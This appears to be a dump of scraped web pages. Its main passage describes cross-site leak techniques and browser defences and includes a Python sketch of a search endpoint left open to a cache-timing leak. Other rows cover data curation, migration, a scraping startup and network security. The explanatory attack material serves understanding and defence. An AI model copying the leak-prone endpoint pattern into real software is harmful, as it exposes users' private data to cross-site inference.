executions took, the researchers were able to reveal information about the state of a web app. 45 Error events are a leak technique that allows an attacker to distinguish between multiple responses by registering error-event handlers and listening for events through them. Due to their versatility and ability to leak a wide range of information, error events are considered a classic cross-site leak vector. 46 One of the most common use cases for error events in cross-site leak attacks is determining the nature of HTTP responses by attaching onload and onerror event handlers to an HTML element and waiting for specific error events to occur. A lack of error events indicates no HTTP errors occurred. In contrast, if the onerror handler is triggered with a specific error event, the attacker can use that information to distinguish between HTTP content types, status codes and media-type errors. 47 In 2019, researchers from TU Darmstadt showed this technique could be used to perform a targeted deanonymization attack against users of popular web services such as Dropbox, Google Docs, and GitHub that allow users to share arbitrary content with each other. 48 49 Since 2019, the capabilities of error events have been expanded. In 2020, Janc et al. showed that by setting the redirect mode for a fetch request to manual, a website could leak information about whether a specific URL is a redirect. 50 42 Around the same time, Jon Masas and Luan Herrara showed that by abusing URL-related limits, an attacker could trigger error events that could be used to leak redirect information about URLs. 51 In 2021, Knittel et al.
showed that error events generated by a subresource integrity check, a mechanism that is used to confirm that a sub-resource a website loads has not been changed or compromised, could also be used to guess the raw content of an HTTP response and to leak the content-length of the response. 52 53 Cache-timing attacks rely on the ability to infer hits and misses in shared caches on the web platform. 54 One of the first instances of a cache-timing attack involved making a cross-origin request to a page and then probing for the existence of the resources loaded by the request in the shared HTTP and DNS caches. The paper describing the attack was written by researchers at Purdue University in 2000, and describes the attack's ability to leak a large portion of a user's browsing history by selectively checking if resources that are unique to a web page have been loaded. 55 54 56 This attack has become increasingly sophisticated, allowing the leakage of other types of information. In 2014, Jia et al. showed this attack could geo-locate a person by measuring the time it takes for the localized domain of a group of multinational websites to load. 54 57 58 In 2015, Van Goethem et al. showed that, using the then newly introduced application cache, a website could instruct the browser to disregard and override any caching directive the victim website sends. The paper also demonstrated a website could gain information about the size of the cached response by timing the cache access. 59 60 Global-limit attacks, which are also known as pool-party attacks, do not directly rely on the state of the victim web app. This cross-site leak was first discovered by Knittel et al. in 2020 and then expanded by Snyder et al. in 2023. 45 The attack abuses global operating-system or hardware limitations to starve shared resources. 61 Global limits that could be abused include the number of raw socket connections that can be opened and the number of service workers that can be registered. An attacker can infer the state of the victim website by performing an activity that triggers these global limits and comparing any differences in browser behaviour when the same activity is performed without the victim website being loaded. 62 Since these types of attacks typically also require timing side channels, they are also considered timing attacks. 45 In 2019, Gareth Heyes discovered that by setting the URL hash of a website to a specific value and subsequently detecting whether a loss of focus on the current web page occurred, an attacker could determine the presence and position of elements on a victim website. 63 In 2020, Knittel et al. showed that an attacker could leak whether or not a Cross-Origin-Opener-Policy header was set by obtaining a reference to the window object of a victim website by framing the website or by creating a popup of the victim website. Using the same technique of obtaining window references, an attacker could also count the number of frames a victim website had through the window.length property. 44 64 While newer techniques continue to be found, older techniques for performing cross-site leaks have become obsolete due to changes in the World Wide Web Consortium (W3C) specifications and updates to browsers. In December 2020, Apple updated the Intelligent Tracking Prevention (ITP) mechanism in its Safari browser, rendering a variety of cross-site leak techniques researchers at Google had discovered ineffective.
65 66 67 Similarly, the widespread introduction of cache partitioning in all major browsers in 2020 has reduced the potency of cache-timing attacks. 68 The example of a Python-based web application with a search endpoint implemented using a Jinja template (a sketch of such an endpoint appears at the end of this passage) demonstrates a common scenario of how a cross-site leak attack could occur. 36 The template displays search results on a webpage. It loops through a collection of results provided by an HTTP server backend and displays each result along with its description inside a structured div element alongside an icon loaded from a different website. The underlying application authenticates the user based on cookies that are attached to the request and performs a textual search of the user's private information using a string provided in a GET parameter. For every result returned, an icon that is loaded from a Content Delivery Network (CDN) is shown alongside the result. 32 69 This simple functionality is vulnerable to a cross-site leak attack. 32 A JavaScript snippet implementing the attack, which can be embedded in an attacker-controlled web app, loads the victim web app inside an iframe, waits for the document to load and subsequently requests the icon from the CDN. The attacker can determine whether the icon was cached by timing its return. Because the icon will be cached if and only if the victim app returns at least one result, the attacker can determine whether the victim app returned any results for the given query. 36 69 26 Before 2017, websites could defend against cross-site leaks by ensuring the same response was returned for all application states, thwarting the attacker's ability to differentiate the requests. This approach was infeasible for any non-trivial website. The second approach was to create session-specific URLs that would not work outside a user's session. This approach limited link sharing, and was impractical. 18 70 Most modern defences are extensions to the HTTP protocol that either prevent state changes, make cross-origin requests stateless, or completely isolate shared resources across multiple origins. 68 One of the earliest methods of performing cross-site leaks was using the HTTP cache, an approach that relied on querying the browser cache for unique resources a victim's website might have loaded. By measuring the time it took for a cross-origin request to resolve, an attacking website could determine whether the resource was cached and, if so, the state of the victim app. 69 72 As of October 2020, most browsers have implemented HTTP cache partitioning, drastically reducing the effectiveness of this approach. 73 HTTP cache partitioning works by multi-keying each cached request depending on which website requested the resource. This means if a website loads and caches a resource, the cached request is linked to a unique key generated from the resource's URL and that of the requesting website. If another website attempts to access the same resource, the request will be treated as a cache miss unless that website has previously cached an identical request. This prevents an attacking website from deducing whether a resource has been cached by a victim website. 74 75 76
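The Jinja template and the attacking script referenced earlier in this passage did not survive scraping. As a rough stand-in, here is a minimal Flask sketch assuming only the behaviour described above: cookie-based authentication, a search string taken from a GET parameter, and an icon loaded from a CDN for every result. The route, cookie name, CDN URL and sample data are all invented.

from flask import Flask, request, render_template_string

app = Flask(__name__)

RESULTS_TEMPLATE = """
{% for result in results %}
  <div class="result">
    <!-- third-party icon: it is fetched (and cached) only if at least
         one result is rendered -->
    <img src="https://cdn.example.org/result-icon.png" alt="">
    <h3>{{ result.title }}</h3>
    <p>{{ result.description }}</p>
  </div>
{% endfor %}
"""

PRIVATE_NOTES = [
    {"title": "Tax return", "description": "2023 filing"},
    {"title": "Medical results", "description": "lab report"},
]

@app.route("/search")
def search():
    if not request.cookies.get("session"):       # authentication via cookie
        return "login required", 401
    q = request.args.get("q", "")                # search string from a GET parameter
    results = [n for n in PRIVATE_NOTES
               if q and q.lower() in n["title"].lower()]
    return render_template_string(RESULTS_TEMPLATE, results=results)

An attacker page would embed /search with a chosen query in an iframe and then time a fetch of result-icon.png: a fast, cached load implies the template rendered at least one result, which is the leak the article describes.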
Another, more developer-oriented feature that allows the isolation of execution contexts is the Cross-Origin-Opener-Policy (COOP) header, which was originally added to address Spectre issues in the browser. 77 78 It has proved useful for preventing cross-site leaks because if the header is set with a same-origin directive as part of the response, the browser will prevent cross-origin websites from holding a reference to the defending website when it is opened from a third-party page. 79 80 81 As part of an effort to mitigate cross-site leaks, the developers of all major browsers have implemented storage partitioning, 82 allowing all shared resources used by each website to be multi-keyed, dramatically reducing the number of inclusion techniques that can infer the states of a web app. 83 Cross-site leak attacks depend on the ability of a malicious web page to receive cross-origin responses from the victim application. By preventing the malicious application from being able to receive cross-origin responses, the user is no longer in danger of having state changes leaked. 84 This approach is seen in defences such as the deprecated X-Frame-Options header and the newer frame-ancestors directive in Content-Security-Policy headers, which allow the victim application to specify which websites can include it as an embedded frame. 85 If the victim app disallows the embedding of the website in untrusted contexts, the malicious app can no longer observe the response to cross-origin requests made to the victim app using the embedded frame technique. 86 87 A similar approach is taken by the Cross-Origin Read Blocking (CORB) mechanism and the Cross-Origin-Resource-Policy (CORP) header, which allow a cross-origin request to succeed but block the loading of the content in third-party websites if there is a mismatch between the content type that was expected and that which was received. 88 This feature was originally introduced as part of a series of mitigations against the Spectre vulnerability 89 but it has proved useful in preventing cross-origin leaks because it blocks the malicious web page from receiving the response and thus inferring state changes. 86 90 91 One of the most effective approaches to mitigating cross-site leaks has been the use of the SameSite parameter in cookies. Once set to Lax or Strict, this parameter prevents the browser from sending cookies in most third-party requests, effectively making the request stateless. note 5 91 Adoption of SameSite cookies, however, has been slow because it requires changes in the way many specialized web servers, such as authentication providers, operate. 93 In 2020, the makers of the Chrome browser announced they would be turning on SameSite Lax as the default state for cookies across all platforms. 94 95 Despite this, there are still cases in which SameSite Lax cookies are not respected, such as Chrome's Lax + POST mitigation, which allows a cross-origin site to use a SameSite Lax cookie in a request if the request is sent as part of a navigation and occurs within two minutes of the cookie being set. 92 This has led to bypasses and workarounds against the SameSite Lax limitation that still allow cross-site leaks to occur. 96 97 Fetch metadata headers, which include the Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-User and Sec-Fetch-Dest headers, have also been used to mitigate cross-site leak attacks. 98 These headers provide the defending web server with information about the domain that initiated the request, how the request was initiated, and the destination of the request. They allow the web server to distinguish between legitimate same-site requests and potentially harmful cross-origin requests.
By discriminating between these requests, the server can send a stateless response to malicious third-party requests and a stateful response to routine same-site requests. 99 To prevent abuse, web apps are not allowed to set these headers themselves; they can only be set by the browser. 100 75 |
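As a minimal server-side sketch of how the defences discussed above can be combined, the Flask snippet below sets a SameSite cookie, adds COOP and CORP isolation headers, and uses the browser-set Sec-Fetch-Site header to answer cross-site requests statelessly. The routes, cookie values and responses are illustrative only and are not taken from the article.

from flask import Flask, request, make_response

app = Flask(__name__)

@app.route("/login", methods=["POST"])
def login():
    resp = make_response("logged in")
    # SameSite=Lax keeps the cookie out of most cross-site subresource
    # requests, making them effectively stateless for an attacker.
    resp.set_cookie("session", "opaque-token",
                    samesite="Lax", secure=True, httponly=True)
    return resp

@app.after_request
def isolation_headers(resp):
    # COOP stops cross-origin pages from keeping a window reference;
    # CORP blocks other sites from loading these responses as subresources.
    resp.headers["Cross-Origin-Opener-Policy"] = "same-origin"
    resp.headers["Cross-Origin-Resource-Policy"] = "same-origin"
    return resp

@app.route("/search")
def search():
    # The browser, not the page, sets Sec-Fetch-Site, so "cross-site"
    # reliably marks requests initiated by another origin.
    if request.headers.get("Sec-Fetch-Site", "none") == "cross-site":
        return "", 204                      # stateless: nothing to leak
    return "stateful search results for the logged-in user"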
494 | https://en.wikipedia.org/wiki/Web_scraping | https://developer.wikimedia.org | Find technical documentation, and connect with the developer community behind Wikipedia and other Wikimedia projects. Get started Access articles from Wikipedia, media files, structured data, and more with public APIs and downloads. Tools and bots make it easier to edit and maintain Wikimedia projects. Help build the Wikimedia ecosystem with open source software. Get involved with the Wikimedia technical community, and find opportunities for support and learning. Find resources to help with questions and troubleshooting. |
495 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_curation | Data curation is the organization and integration of data collected from various sources. It involves annotation, publication and presentation of the data so that the value of the data is maintained over time, and the data remains available for reuse and preservation. Data curation includes "all the processes needed for principled and controlled data creation, maintenance, and management, together with the capacity to add value to data". 1 In science, data curation may indicate the process of extraction of important information from scientific texts, such as research articles by experts, to be converted into an electronic format, such as an entry of a biological database. 2 In the modern era of big data, the curation of data has become more prominent, particularly for software processing high volume and complex data systems. 3 The term is also used within the humanities, 4 where increasing cultural and scholarly data from digital humanities projects requires the expertise and analytical practices of data curation. 5 In broad terms, curation means a range of activities and processes done to create, manage, maintain, and validate a component. 6 Specifically, data curation is the attempt to determine what information is worth saving and for how long. 7 The user, rather than the database itself, typically initiates data curation and maintains metadata. 8 According to the University of Illinois' Graduate School of Library and Information Science, "Data curation is the active and on-going management of data through its lifecycle of interest and usefulness to scholarship, science, and education; curation activities enable data discovery and retrieval, maintain quality, add value, and provide for re-use over time. 9 The data curation workflow is distinct from data quality management, data protection, lifecycle management, and data movement. 8 Census data has been available in tabulated punch card form since the early 20th century and has been electronic since the 1960s. 10 The Inter-university Consortium for Political and Social Research (ICPSR) website marks 1962 as the date of their first Survey Data Archive. 11 Deep background on data libraries appeared in a 1982 issue of the Illinois journal, Library Trends. 12 For historical background on the data archive movement, see "Social Scientific Information Needs for Numeric Data: The Evolution of the International Data Archive Infrastructure. 13 The exact curation process undertaken within any organisation depends on the volume of data, how much noise the data contains, and what the expected future use of the data means to its dissemination. 3 The crises in space data led to the 1999 creation of the Open Archival Information System (OAIS) model, 14 stewarded by the Consultative Committee for Space Data Systems (CCSDS), which was formed in 1982. 15 The term data curation is sometimes used in the context of biological databases, where specific biological information is firstly obtained from a range of research articles and then stored within a specific category of database. For instance, information about anti-depressant drugs can be obtained from various sources and, after checking whether they are available as a database or not, they are saved under a drug's database's anti-depressive category. Enterprises are also utilizing data curation within their operational and strategic processes to ensure data quality and accuracy. 
16 17 The Dissemination Information Packages (DIPS) for Information Reuse (DIPIR) project is studying research data produced and used by quantitative social scientists, archaeologists, and zoologists. The intended audience is researchers who use secondary data and the digital curators, digital repository managers, data center staff, and others who collect, manage, and store digital information. 18 The Protein Data Bank was established in 1971 at Brookhaven National Laboratory, and has grown into a global project. 19 A database for three-dimensional structural data of proteins and other large biological molecules, the PDB contains over 120,000 structures, all standardized, validated against experimental data, and annotated. FlyBase, the primary repository of genetic and molecular data for the insect family Drosophilidae, dates back to 1992. FlyBase annotates the entire Drosophila melanogaster genome. 20 The Linguistic Data Consortium is a data repository for linguistic data, dating back to 1992. 21 The Sloan Digital Sky Survey began surveying the night sky in 2000. 22 Computer scientist Jim Gray, while working on the data architecture of the SDSS, championed the idea of data curation in the sciences. 23 DataNet was a research program of the U.S. National Science Foundation Office of Cyberinfrastructure, funding data management projects in the sciences. 24 DataONE (Data Observation Network for Earth) is one of the projects funded through DataNet, helping the environmental science community preserve and share data. 25 |
496 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_migration | Data migration is the process of selecting, preparing, extracting, and transforming data and permanently transferring it from one computer storage system to another. Additionally, the validation of migrated data for completeness and the decommissioning of legacy data storage are considered part of the entire data migration process. 1 2 Data migration is a key consideration for any system implementation, upgrade, or consolidation, and it is typically performed in such a way as to be as automated as possible, freeing up human resources from tedious tasks. Data migration occurs for a variety of reasons, including server or storage equipment replacements, maintenance or upgrades, application migration, website consolidation, disaster recovery, and data center relocation. 2 As of 2011 update , "nearly 40 percent of data migration projects were over time, over budget, or failed entirely. 1 3 Thus, proper planning is critical for an effective data migration. While the specifics of a data migration plan may vary—sometimes significantly—from project to project, IBM suggests there are three main phases to most any data migration project: planning, migration, and post-migration. 2 Each of those phases has its own steps. During planning, dependencies and requirements are analyzed, migration scenarios get developed and tested, and a project plan that incorporates the prior information is created. During the migration phase, the plan is enacted, and during post-migration, the completeness and thoroughness of the migration is validated, documented, and closed out, including any necessary decommissioning of legacy systems. 2 For applications of moderate to high complexity, these data migration phases may be repeated several times before the new system is considered to be fully validated and deployed. Planning: The data and applications to be migrated are selected based on business, project, and technical requirements and dependencies. Hardware and bandwidth requirements are analyzed. Feasible migration and back-out scenarios are developed, as well as the associated tests, automation scripts, mappings, and procedures. Data cleansing and transformation requirements are also gauged for data formats to improve data quality and to eliminate redundant or obsolete information. Migration architecture is decided on and developed, any necessary software licenses are obtained, and change management processes are started. 1 2 Migration: Hardware and software requirements are validated, and migration procedures are customized as needed. Some sort of pre-validation testing may also occur to ensure requirements and customized settings function as expected. If all is deemed well, migration begins, including the primary acts of data extraction, where data is read from the old system, and data loading, where data is written to the new system. Additional verification steps ensure the developed migration plan was enacted in full. 1 2 Post-migration: After data migration, results are subjected to data verification to determine whether data was accurately translated, is complete, and supports processes in the new system. During verification, there may be a need for a parallel run of both systems to identify areas of disparity and forestall erroneous data loss. Additional documentation and reporting of the migration project is conducted, and once the migration is validated complete, legacy systems may also be decommissioned. 
Migration close-out meetings will officially end the migration process. 1 2 There is a difference between data migration and data integration activities. Data migration is a project through which data will be moved or copied from one environment to another, and removed or decommissioned in the source. During the migration (which can take place over months or even years), data can flow in multiple directions, and there may be multiple simultaneous migrations. The ETL (extract, transform, load) actions will be necessary, although the means of achieving these may not be those traditionally associated with the ETL acronym. Data integration, by contrast, is a permanent part of the IT architecture, and is responsible for the way data flows between the various applications and data stores—and is a process rather than a project activity. Standard ETL technologies designed to supply data from operational systems to data warehouses would fit within the latter category. 4 Data is stored on various media in files or databases, and is generated and consumed by software applications, which in turn support business processes. The need to transfer and convert data can be driven by multiple business requirements, and the approach taken to the migration depends on those requirements. Four major migration categories are proposed on this basis. A business may choose to rationalize the physical media to take advantage of more efficient storage technologies. 2 This will result in having to move physical blocks of data from one tape or disk to another, often using virtualization techniques. The data format and content itself will not usually be changed in the process and can normally be achieved with minimal or no impact to the layers above. 5 Similarly, it may be necessary to move from one database vendor to another, or to upgrade the database software being used. The latter case is less likely to require a physical data migration, but this can happen with major upgrades. In these cases a physical transformation process may be required since the underlying data format can change significantly. This may or may not affect behavior in the applications layer, depending largely on whether the data manipulation language or protocol has changed. 6 However, some modern applications are written to be almost entirely agnostic to the database technology, 7 so a change from Sybase, MySQL, IBM Db2 or SQL Server to Oracle should only require a testing cycle to be confident that both functional and non-functional performance has not been adversely affected. Changing application vendor—for instance a new CRM or ERP platform—will inevitably involve substantial transformation as almost every application or suite operates on its own specific data model and also interacts with other applications and systems within the enterprise application integration environment. 8 Furthermore, to allow the application to be sold to the widest possible market, commercial off-the-shelf packages are generally configured for each customer using metadata. Application programming interfaces (APIs) may be supplied by vendors to protect the integrity of the data they must handle. Business processes operate through a combination of human and application systems actions, often orchestrated by business process management tools. When these change they can require the movement of data from one store, database or application to another to reflect the changes to the organization and information about customers, products and operations. 
Examples of such migration drivers are mergers and acquisitions, business optimization, and reorganization to attack new markets or respond to competitive threat. 9 The first two categories of migration are usually routine operational activities that the IT department takes care of without the involvement of the rest of the business. The last two categories directly affect the operational users of processes and applications, are necessarily complex, and delivering them without significant business downtime can be challenging. A highly adaptive approach, concurrent synchronization, a business-oriented audit capability, and clear visibility of the migration for stakeholders—through a project management office or data governance team—are likely to be key requirements in such migrations. 9 Migration, which focuses on the digital object itself, is the act of transferring, or rewriting data from an out-of-date medium to a current medium and has for many years been considered the only viable approach to long-term preservation of digital objects. 10 Reproducing brittle newspapers onto microfilm is an example of such migration. |
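As a toy illustration of the extract-transform-load steps the migration phases above describe, the sketch below copies records from an invented legacy schema into a new one and then verifies row counts before the legacy store would be decommissioned. The table layouts and data are made up for the example.

import sqlite3

legacy = sqlite3.connect(":memory:")
target = sqlite3.connect(":memory:")

legacy.execute("CREATE TABLE customers_old (id INTEGER, full_name TEXT, created TEXT)")
legacy.executemany("INSERT INTO customers_old VALUES (?, ?, ?)",
                   [(1, "Ada Lovelace", "1999-12-31"),
                    (2, "Alan Turing", "2001-06-23")])

target.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, "
               "first_name TEXT, last_name TEXT, created TEXT)")

# Extract: read everything from the legacy store.
rows = legacy.execute("SELECT id, full_name, created FROM customers_old").fetchall()

# Transform: split the legacy single-name field into the new schema's two fields.
transformed = []
for cid, full_name, created in rows:
    first, _, last = full_name.partition(" ")
    transformed.append((cid, first, last, created))

# Load: write the reshaped records into the new system.
target.executemany("INSERT INTO customers VALUES (?, ?, ?, ?)", transformed)
target.commit()

# Post-migration verification: row counts must match before decommissioning.
assert (legacy.execute("SELECT COUNT(*) FROM customers_old").fetchone()[0]
        == target.execute("SELECT COUNT(*) FROM customers").fetchone()[0])
print("migration verified")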
497 | https://en.wikipedia.org/wiki/Data_scraping | https://www.wired.com/2014/03/kimono/ | To revisit this article, visit My Profile, then View saved stories. The number of web pages on the internet is somewhere north of two billion, perhaps as many as double that. It's a huge amount of raw information. By comparison, there are only roughly 10,000 web APIs the virtual pipelines that let developers access, process, and repackage that data. In other words, to do anything new with the vast majority of the stuff on the web, you need to scrape it yourself. Even for the people who know how to do that, it's tedious. Ryan Rowe and Pratap Ranade want to change that. For the last five months, Rowe and Ranade have been building out Kimono, a web app that lets you slurp data from any website and turn it instantly into an API. Using a bookmarklet, you highlight the parts of a site you want to scrape and Kimono does the rest. Those with programming chops can take the code Kimono spits out bake it into their own apps; for the code illiterate, Kimono will automatically rework scraped data into a dynamic chart, list, or a simple web app. In essence, it's a point and click toolkit for taking apart the web, with the aim of letting people build new things with it. Excitement's already bubbling around the potential. Kimono's already raised money from big-name VCs like Ron Conway and its founders have had to turn down at least one offer for an early buy-out. The site's already managing some 15,000 users and it's still in beta. But for Rowe and Ranade, things are just getting started. The idea for Kimono was born out of Rowe's time as a developer at the design consultancy Frog, where he continually ran into the same frustrating problem. A designer would have an idea that revolved around web stuff of one sort or another, but they'd have to find a developer before they could even get a sense of how the idea might actually work. "Getting the data just to prove if these apps would be interesting or not took a huge amount of time, which sucked, Rowe says. "You have these situations where designers and analysts really want to do stuff with data but have no means to get it, adds Ranade, whose most recent gig was at consulting firm McKinsey Company. "We realized that there doesn't need to be that bottleneck. It's about letting artists, historians, sociologists cull and combine content. To laypeople who don't already think of the web in terms of streams, sources, or APIs, it can be hard to grasp Kimono's potential. But early adopters are already using it for a striking variety of projects. When they noticed there was no official API for the recent Sochi Olympics, Rowe and Ranade used Kimono to create one themselves. Devs and designers took it from there, building elegant medal-tracking apps, dynamic maps that visualize when and where Olympians were born, and more. Around the time the Kimono beta went live last month, Golan Levin, a pioneer of computational art and design, was introducing his students at Carnegie Mellon to the unglamorous first steps of any data viz project: acquiring, parsing, and cleaning data. He thought it'd be valuable to acquaint them with the process. While new tools like Temboo are making it easier than ever to work with official APIs for big-name sites, there traditionally haven't been straightforward ways to get structured data off the majority of pages on the web. "Kimono came along and really changed that, Levin says. 
Levin himself is using Kimono to track real estate purchases in his home town of Pittsburgh. He also cited an upcoming meeting of civic-minded coders called the Pittsburgh Data Brigade, where he expected Kimono to see some use. "Pittsburgh's information systems are so old and creaky that getting data out is really hard, he explains. It's a problem many municipalities face; they're eager to open up their data but lack the means to actually open it up. Kimono could help bridge that gap. These use cases might sound esoteric, and in some senses, they are. But part of the ambition with Kimono is bringing data scraping to a wider audience. It's about letting artists, historians, sociologists and more cull and combine content from various sources and present it in novel ways. As an example, Ranade brings up Malcolm Gladwell's theory about elite hockey players and how their success might be explained by where their birthdays fall in relation to Canada's little league cutoff dates. A successful author like Gladwell can presumably tap a research assistant to trawl Wikipedia and collect the relevant data. A grad student probably cannot. With Kimono, however, she could amass a list of Wikipedia URLs, point Kimono to the "date of birth" and "place of birth" fields, and let it corral the data for her. This sort of birthday little league cutoff connection isn't going to be made by a random developer, Ranade posts, but rather by a person who has "domain knowledge" in that field. "They might not be a programmer, he says. "But if we gave a little bit of programming capability to that person, how could they look at the world in a different way? In the short term, Rowe and Ranade plan to make money by charging users depending on how many APIs they use and how frequently they update (right now the service is in beta, and anyone can make however many APIs they want). They've already heard interest from a number of corporate clients, who see Kimono as a means to free the flow of data between departments and project teams without relying on an internal IT team to act as translator in-between. But the duo is already thinking even bigger picture. To them, Kimono's greatest potential comes out as we move from today's mobile phones and their attendant apps to the next generation of wearable devices and the internet of things. Kimono's greatest potential comes out as we move to the next generation of wearables. "Smartphones are only a transitional point, Rowe says. "From there we go to smartwatches and Google Glass and other ways of interacting with data around you that don't involve a screen. And to get from there to there to there you need to package up web data and make it consumable in all these different contexts. We're trying to position Kimono to be the framework for that conversion. "When the killer apps finally start coming out for things like smartwatches and glasses, they're not going to be made by the companies that have the most interesting data, he continues. "They're going to come from the developers and designers who are thinking about it a little bit differently. If we suspend our doubts for a moment and peer into this crystal ball, Kimono starts to look like something very big indeed. In the scenario Rowe lays out, it takes root as a sort of connective tissue for an entirely new class of interactions and experiences something like a nervous system for the internet of things. 
You could imagine pointing Kimono at not just websites but other sorts of streams, making objects react to sound, say, or building applications that respond to live video feeds. At that point, you're well beyond the esoteric realm of web scraping. "The ability to turn a website into an API is a very powerful thing, Rowe says. "Being able to turn anything into an API is epically powerful. |
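The Gladwell example above is essentially a small scraping job, and it maps directly onto the requests and BeautifulSoup tools used elsewhere in this document. The sketch below is only an illustration: the two URLs are arbitrary, and the .bday and .birthplace selectors are an assumption about Wikipedia's infobox markup that may need adjusting.

import requests
from bs4 import BeautifulSoup

PLAYER_PAGES = [
    "https://en.wikipedia.org/wiki/Wayne_Gretzky",   # example article URLs
    "https://en.wikipedia.org/wiki/Mario_Lemieux",
]

def birth_info(url: str) -> dict:
    """Scrape birth date and birthplace fields from one article, if present."""
    soup = BeautifulSoup(requests.get(url, timeout=10).text, "html.parser")
    bday = soup.select_one(".infobox .bday")          # assumed microformat class
    place = soup.select_one(".infobox .birthplace")   # assumed class name
    return {"url": url,
            "born": bday.get_text(strip=True) if bday else None,
            "birthplace": place.get_text(" ", strip=True) if place else None}

for page in PLAYER_PAGES:
    print(birth_info(page))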
498 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Network_security | Network security consists of the policies, processes and practices adopted to prevent, detect and monitor unauthorized access, misuse, modification, or denial of a computer network and network-accessible resources. 1 Network security involves the authorization of access to data in a network, which is controlled by the network administrator. Users choose or are assigned an ID and password or other authenticating information that allows them access to information and programs within their authority. Network security covers a variety of computer networks, both public and private, that are used in everyday jobs: conducting transactions and communications among businesses, government agencies and individuals. Networks can be private, such as within a company, and others which might be open to public access. Network security is involved in organizations, enterprises, and other types of institutions. It does as its title explains: it secures the network, as well as protecting and overseeing operations being done. The most common and simple way of protecting a network resource is by assigning it a unique name and a corresponding password. Network security starts with authentication, commonly with a username and a password. Since this requires just one detail authenticating the user name—i.e., the password—this is sometimes termed one-factor authentication. With two-factor authentication, something the user 'has' is also used (e.g., a security token or 'dongle', an ATM card, or a mobile phone); and with three-factor authentication, something the user 'is' is also used (e.g., a fingerprint or retinal scan). Once authenticated, a firewall enforces access policies such as what services are allowed to be accessed by the network users. 2 3 Though effective to prevent unauthorized access, this component may fail to check potentially harmful content such as computer worms or Trojans being transmitted over the network. Anti-virus software or an intrusion prevention system (IPS) 4 help detect and inhibit the action of such malware. An anomaly-based intrusion detection system may also monitor the network like wireshark traffic and may be logged for audit purposes and for later high-level analysis. Newer systems combining unsupervised machine learning with full network traffic analysis can detect active network attackers from malicious insiders or targeted external attackers that have compromised a user machine or account. 5 Communication between two hosts using a network may be encrypted to maintain security and privacy. Honeypots, essentially decoy network-accessible resources, may be deployed in a network as surveillance and early-warning tools, as the honeypots are not normally accessed for legitimate purposes. Honeypots are placed at a point in the network where they appear vulnerable and undefended, but they Network security involves the authorization of access to data in a network, which is controlled by the network administrator. Users choose or are assigned an ID ...are actually isolated and monitored. 6 Techniques used by the attackers that attempt to compromise these decoy resources are studied during and after an attack to keep an eye on new exploitation techniques. Such analysis may be used to further tighten security of the actual network being protected by the honeypot. A honeypot can also direct an attacker's attention away from legitimate servers. 
A honeypot encourages attackers to spend their time and energy on the decoy server while distracting their attention from the data on the real server. Similar to a honeypot, a honeynet is a network set up with intentional vulnerabilities. Its purpose is also to invite attacks so that the attacker's methods can be studied and that information can be used to increase network security. A honeynet typically contains one or more honeypots. 7 Previous research on network security was mostly about using tools to secure transactions and information flow, and how well users knew about and used these tools. However, more recently, the discussion has expanded to consider information security in the broader context of the digital economy and society. This indicates that it's not just about individual users and tools; it's also about the larger culture of information security in our digital world. 8 Security management for networks is different for all kinds of situations. A home or small office may only require basic security while large businesses may require high-maintenance and advanced software and hardware to prevent malicious attacks from hacking and spamming. In order to minimize susceptibility to malicious attacks from external threats to the network, corporations often employ tools which carry out network security verifications . Networks are subject to attacks from malicious sources. Attacks can be from two categories: "Passive" when a network intruder intercepts data traveling through the network, and "Active" in which an intruder initiates commands to disrupt the network's normal operation or to conduct reconnaissance and lateral movements to find and gain access to assets available via the network. 9 Types of attacks include: 10 |
499 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&oldid=1214697307 | This is the current revision of this page, as edited by OAbot (talk contribs) at 16:03, 20 March 2024 (Open access bot: hdl updated in citation with oabot.). The present address (URL) is a permanent link to this version. Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. 
